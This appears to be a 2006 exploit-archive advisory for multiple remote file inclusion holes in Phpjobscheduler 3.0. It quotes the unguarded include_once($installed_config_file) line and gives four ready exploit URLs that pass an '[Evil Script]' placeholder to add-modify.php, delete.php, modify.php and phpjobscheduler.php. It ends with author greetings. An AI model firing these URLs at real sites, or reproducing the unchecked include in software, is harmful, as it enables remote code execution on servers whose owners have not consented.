[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Phpjobscheduler 3.0 (installed_config_file) File Include Vulnerabilities
# Published : 2006-11-13
# Author : Firewall
# Previous Title : Property Pro 1.0 (vir_Login.asp) Remote Login Bypass Vulnerability
# Next Title : PHPWind <= 5.0.1 (AdminUser) Remote Blind SQL Injection Exploit
======================================================================
# Phpjobscheduler 3.0 - Multiple Remote File Include by Firewall
# Application Affect:
phpjobscheduler 3.0
# Source Code:
http://scripts.ringsworld.com/development-tools/phpjobscheduler.v3.0.zip
# Code:
include_once($installed_config_file)
# ExPloit :
http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=[Evil Script]
# Contact:
Firewall1954@hotmail.com
# GrEatZ :
|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok|
|Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis|
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|
"El ceviche y El pisco es peruano y jamas podran igualar su calidad"
"Viva el Peru"
======================================================================
# www.Syue.com [2006-11-13]